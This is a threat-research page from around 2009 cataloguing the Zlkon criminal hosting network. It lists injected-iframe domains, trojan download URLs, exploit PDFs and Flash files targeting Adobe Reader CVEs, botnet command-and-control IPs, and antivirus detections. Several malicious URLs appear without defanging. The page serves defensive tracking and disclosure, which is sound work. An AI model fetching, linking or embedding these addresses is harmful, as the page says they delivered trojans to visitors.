Black Hat SEO - RBN Hacks, p.1

The silent threat: Black Hat SEO, exploits, hacks, botnets Inspecting the bad network READ THIS page if you need more information WARNING: All sites listed on this page are dangerous (live URL with exploits) which lead to trojans beeing automatically installed on your computer. Do NOT visit them unless you know what you are doing. (only links are safe) If you want information about desinfection check out this page: Analysis of a website infected with a hidden iframe (by NoVirusThanks) This doesn't include the desinfection of your website (attacked - iframed). For this change your passwords (windows passwords, FTP, emails, database access etc.) and remove the content injected on each page as quickly as possible (contact your hosting provider for assistance). This page reference domain found in thousand of compromised websites using obfuscated javascript code injected (IFRAME). The Zlkon network (DATORU EXPRESS SERVISS) has been cited in several blogs for hosting malicious content for cyber criminals - for example: On Symantec website for spreading the TDSS trojan [hs.2-104.zlkon.lv] - in conjunction with IPs at UkrTeleGroup Ltd.in December 2008 85.255.115.156 85.255.112.87 85.255.115.50 85.255.112.154 On the msmvps' blog for inaccurate whois details in January 2009 On bluetack.co.uk forum for rogue antivirus here in January 2009 Another example with "Total Defender", other rogue antivirus here Also found on several websites including fireeye "Bad Actors Part 2 - ZlKon" - dancho danchev's blog Network in conjunction cited here: Bad, bad, cybercrime-friendly ISPs! A quick look at two IPs at Zlkon in Latvia 94.247.3.152 [hs.3-152.zlkon.lv] Using the dns ns1.freednshostserver.com [78.109.18.234] ns1.freednshostserver.com [78.109.18.235] descr: Datacenter Hosting.UA route: 78.109.16.0/20 origin: AS41665 we have these domain currently live and kicking a lot of websites (simply enter a domain or "in.cgi?cocacola" in google reveal a lot of chat related to hacked domain iframed.) betstarwager.cn/in.cgi?cocacola Analysis bestlotron.cn/in.cgi?cocacola Analysis denverfilmdigitalmedia.cn/in.cgi?cocacola Analysis diettopseek.cn/in.cgi?cocacola Analysis filmlifemusicsite.cn/in.cgi?cocacola Analysis filmlifemusicsite.cn/ Analysis filmtypemedia.cn/in.cgi?cocacola Analysis litedownloadseek.cn/in.cgi?cocacola Analysis litetopfindworld.cn/in.cgi?cocacola Analysis litetoplocatesite.cn/in.cgi?cocacola Analysis nanotopfind.cn/in.cgi?cocacola Analysis promixgroup.cn/in.cgi?cocacola Analysis yourliteseek.cn/in.cgi?cocacola Analysis     ghrgt.hostindianet.com/index.php Analysis lieliteautobody.cn/load.php?id=4 [94.247.3.151] Anubis - VirusTotal Botnet C&C: 213.155.4.82 Anubis Family 1175580     ghrgt.hostindianet.com/cache/readme.pdf Analysis zzzz.hostindianet.com/load.php?id=4 Anubis - VirusTotal Botnet C&C: 213.155.4.80 78.109.30.224     Also cited on Dancho Danchv's blog here in the serie of embassies websites iframed. (11 of them - including hostindianet[.]com) On the next IP: 94.247.3.151 [hs.3-152.zlkon.lv] hxxp://bigtopescorts.cn/in.cgi?id1000 (dead)   hxxp://cheapslotplay.cn/in.cgi?income48 Redirect to exploit hxxp://hyperliteautoservices.cn/index.php (dead) but the trojan is still available on hyperliteautoservices.cn/load.php VirusTotal - Anubis hxxp://daddybigtop.cn Load trojan on hxxp://freeonlinehostguide.com/load.php VirusTotal - Redirection Analysis - Anubis Detection: Trojan-Downloader.Win32.Bredolab!IK TR/Crypt.ZPACK.Gen Trojan-Downloader.Win32.Bredolab Trojan:Win32/Meredrop Using a stack overflow in adobe reader 8.1.2 CVE-2008-2992 hxxp://educationbigtop.cn VirusTotal Report (Brebolab) hxxp://freehostinternet.com Load trojan on hxxp://daddybigtop.cn/load.php VirusTotal - Anubis Detection: Trojan-Downloader.Win32.Bredolab Connect to botnet: 213.155.6.33 hxxp://freeonlinehostguide.com/ index.php Load trojan on hxxp://zzz.free.hostindianet.com/load.php?id=4 VirusTotal - Javascript Analysis - Anubis Detection: TR/Crypt.XPACK.Gen Win32:Walpak Win32/Kryptik.LI Trojan.Waledac.Gen!Pac.8 It connect to a URL and drop the file "digiwet.dll" Botnets C&C: turokgame.cn [74.50.98.156] 94.247.2.95 and 78.109.30.224 hxxp://freewebhostguide.com Symantec hxxp://greatbethere.cn Load trojan on hxxp://greatbethere.cn/load.php?id=4 VirusTotal - Javascript Analysis - Anubis Detection: TR/Crypt.XPACK.Gen Win32:Walpak Win32/Kryptik.LI Trojan.Waledac.Gen!Pac.8 Using a stack overflow in adobe reader 8.1.1 CVE-2007-5659 It connect to a URL and drop the file "digiwet.dll" Botnets C&C: 213.155.6.32 78.109.30.224 hxxp://hugetopnonfat.cn dead hxxp://mediahomenamemartvideo.cn/ in.cgi?income Botnet C&C / redirect to exploit hxxp://hyperliteautoservices.cn/index.php (dead) but the trojan is still available on hyperliteautoservices.cn/load.php VirusTotal - Redirection Analysis - Anubis hxxp://hyperliteautoservices.cn Redirect to exploit hxxp://hyperliteautoservices.cn/index.php but the trojan is still available on hyperliteautoservices.cn/load.php VirusTotal - Redirection Analysis - Anubis Flash exploit is also live: Flash Analysis Botnet C&C: 78.109.29.112 hxxp://lieliteautobody.cn (dead)   hxxp://liteautofinestsite.cn/load.php Exploit not found but trojan still there hxxp://liteautofinestsite.cn/load.php hxxp://liteautogreatest.cn Exploits hxxp://liteautogreatest.cn/cache/readme.pdf hxxp://liteautogreatest.cn/cache/flash.swf to load trojan on hxxp://liteautogreatest.cn/load.php VirusTotal - Redirection Analysis - Anubis Flash exploit is also live: Flash Analysis - VirusTotal Botnet C&C: 78.109.29.112 hxxp://liteautorepair.cn Exploit to load trojan on zzzz.hostindianet.com/load.php?id=4 VirusTotal - Redirection Analysis - Anubis Detection: Trojan-Downloader.Win32.Bredolab Botnet controller: 213.155.4.82 hxxp://litedownloadfinest.cn Exploit to load trojan on zzzz.hostindianet.com/load.php?id=4 VirusTotal - Redirection Analysis - Anubis Detection: TrojanDownloader:Win32/Bredolab.B Previous botnet controller: 78.109.29.112 hxxp://litehitscar.cn/index.php Exploit to load trojan on hyperliteautoservices.cn/load.php?id=4 VirusTotal - Redirection Analysis - Anubis Detection: Trojan.Botnetlog.3 Botnets: 78.109.29.112 - 78.109.30.224 74.54.77.82 hxxp://lieliteautobody.cn/load.php Exploit not found but trojan still there lieliteautobody.cn/load.php hxxp://liteautofinestsite.cn/load.php Exploit not found but trojan still there liteautofinestsite.cn/load.php hxxp://liteupyourride.cn/ Exploits hxxp://liteupyourride.cn/cache/readme.pdf hxxp://liteupyourride.cn/cache/flash.swf to load trojan on hxxp://litehitscar.cn/load.php VirusTotal - Anubis PDF exploit is also live: PDF Analysis - VirusTotal Botnet C&C: 78.109.29.112 hxxp://yournonfatbest.cn Exploit to load trojan on farm-en-12san.hostindianet.com/load.php?id=4 VirusTotal - Redirection Analysis - Anubis Detection: TrojanDownloader:Win32/Bredolab.G Botnets: 213.155.4.82 78.109.30.224 hxxp://lotbetsite.cn Exploit to load trojan on casinoslotbet.cn/load.php - Analysis VirusTotal - Anubis - Flash Exploit Analysis Detection: Trojan-Downloader.Win32.Bredolab Botnet: 213.155.6.33     hxxp://hugetopnonfat.cn/in.cgi?id1000 Javascript Analysis hxxp://PremiumNonfat.cn/all/ dead 94.247.3.150 [hs.3-150.zlkon.lv] hxxp://autobestwestern.cn/ cache/readme.pdf Exploit to load trojan on litehitscar.cn/load.php?id=5 - Analysis VirusTotal - Anubis - Flash Exploit Analysis Detection: TrojanDownloader:Win32/Bredolab.Q Botnet: 78.109.29.112 hxxp://coolnameshop.cn/in.cgi?income   hxxp://cutlot.cn/in.cgi?income Botnet C&C / Exploits to hxxp:// liteautogreatest.cn/index.php Analysis then load trojan located hxxp://litehitscar.cn/load.php?id=5 VirusTotal - Anubis Botnets: 78.109.29.112 - 78.109.30.224 hxxp://dotcomnameshop.cn Botnet C&C hxxp://lotante.cn Botnet C&C / Exploits to litehitscar.cn/index.php Analysis then load trojan located hyperliteautoservices.cn/load.php?id=4 VirusTotal - Anubis Botnets: 78.109.29.112 - 78.109.30.224 74.54.77.82 hxxp://lotbetworld.cn/in.cgi?income Botnet C&C / Exploits to litehitscar.cn/index.php [94.247.3.151] Analysis then load trojan located hyperliteautoservices.cn/load.php?id=4 VirusTotal - Anubis Botnets: 78.109.29.112 - 78.109.30.224 74.54.77.82 hxxp://homenameregistration.cn Botnet C&C / Exploits to 78.41.207.196/vertu/?t=5 Analysis then load trojan located 78.41.207.196 Analysis hxxp://hugetopnonfat.cn Botnet C&C hxxp://dotcomnameshop.cn/ in.cgi?income Botnet C&C / Redirect to exploits hxxp://litehitscar.cn/index.php [94.247.3.151] Redirection Analysis - Exploit analysis then load trojan located hxxp://hyperliteautoservices.cn/load.php?id=4 VirusTotal - Anubis Botnets: 78.109.29.112 - 78.109.30.224 74.54.77.82 hxxp://japanhostnet.com/ in.cgi?income Botnet C&C / Redirect to exploits litehitscar.cn/index.php [94.247.3.151] Redirection Analysis - Exploit analysis then load trojan located hyperliteautoservices.cn/load.php?id=4 VirusTotal - Anubis Botnets: 78.109.29.112 - 78.109.30.224 74.54.77.82 hxxp://internetnamestore.cn/ in.cgi?income18 hyperliteautoservices.cn/index.php [94.247.3.151] Analysis hxxp://lotmachinesguide.cn/ in.cgi?income Redirects to exploits hxxp://liteautogreatest.cn/cache/readme.pdf hxxp://liteautogreatest.cn/cache/flash.swf to load trojan on hxxp://liteautogreatest.cn/load.php VirusTotal - Redirection Analysis - Anubis Botnet C&C: 78.109.29.112 hxxp://mainnameshop.cn Redirect to exploits sdfi.hostindianet.com/index.php (dead) Detection: Win32/Bredolab.B hxxp://mediahomenamemartvideo.cn Botnet C&C down (TS v3.2) hxxp://mediahousenameshopfilm.cn   hxxp://nameashop.cn/in.cgi?income On 2009-03-21 01:40:07 - Analysis Redirect to exploit on hxxp://sadcwed.hostindianet.com/index.php On 2009-04-05 13:22:58 - Analysis Redirect to exploit on freeonlinehostguide.com/index.php Analysis - VirusTotal - Anubis Detection: Waledac - Kryptik.LI - Win32:Walpak Trojan.Crypt.XPACK.Gen It connect to a botnet and drop the file "digiwet.dll" Botnets: turokgame.cn [74.50.98.156] 94.247.2.95 and 78.109.30.224 hxxp://namebrandmart.cn/in.cgi ?income18 litehitscar.cn/load.php Analysis hxxp://namebuyline.cn Analysis hxxp://namebuypicture.cn/ in.cgi?income31 Botnet C&C / redirect to exploit hyperliteautoservices.cn/index.php (dead) but the trojan is still available on hyperliteautoservices.cn/load.php VirusTotal - Anubis - Analysis hxxp://namesupermart.cn Botnet C&C hxxp://namestorefilmlife.cn/ in.cgi?income Botnet C&C / Exploits to litehitscar.cn Analysis then load trojan located hyperliteautoservices.cn/load.php?id=4 VirusTotal - Anubis hxxp://perfectnamestore.cn /in.cgi?income8 Redirect to exploit hyperliteautoservices.cn/index.php (dead) but the trojan is still available on hyperliteautoservices.cn/load.php VirusTotal - Anubis [94.247.3.151] hxxp://playbetwager.cn/in.cgi?income freeonlinehostguide.com/index.php hxxp://superbetfair.cn/in.cgi?income Botnet C&C / Exploits to litehitscar.cn Analysis then load trojan located hyperliteautoservices.cn/load.php?id=4 VirusTotal - Anubis - Redirection Analysis Detection: Trojan.Botnetlog.3 hxxp://thelotbet.cn   hxxp://yourfilmmovie.cn Botnet C&C hxxpp//freeonlinehostguide.com/index.php Analysis Dns AS48856 VENTREX-AS Ventrex LLP 95.129.144.210 freednshostway.com ns1.bigtopescorts.cn ns1.casinobigtop.cn ns1.casinoslotbet.cn ns1.cheapslotplay.cn ns1.daddybigtop.cn ns1.educationbigtop.cn ns1.freednshostway.com ns1.freehostinternet.com ns1.freeonlinehostguide.com ns1.freewebhostguide.com ns1.greatbethere.cn ns1.hostindianet.com ns1.hyperliteautoservices.cn ns1.lieliteautobody.cn ns1.liteautofinestsite.cn ns1.liteautorepair.cn ns1.litehitscar.cn ns1.lotante.cn ns1.lotbetsite.cn ns1.playbetwager.cn AS34187 RENOME-AS Renome-Service: Joint Multimedia Cable Network Odessa, Ukraine 78.26.179.79 ns2.bigtopescorts.cn ns2.casinobigtop.cn ns2.casinoslotbet.cn ns2.cheapslotplay.cn ns2.daddybigtop.cn ns2.educationbigtop.cn ns2.freednshostway.com ns2.freehostinternet.com ns2.freeonlinehostguide.com ns2.freewebhostguide.com ns2.greatbethere.cn ns2.hostindianet.com ns2.hyperliteautoservices.cn ns2.lieliteautobody.cn ns2.liteautofinestsite.cn ns2.liteautorepair.cn ns2.litehitscar.cn ns2.lotante.cn ns2.lotbetsite.cn ns2.playbetwager.cn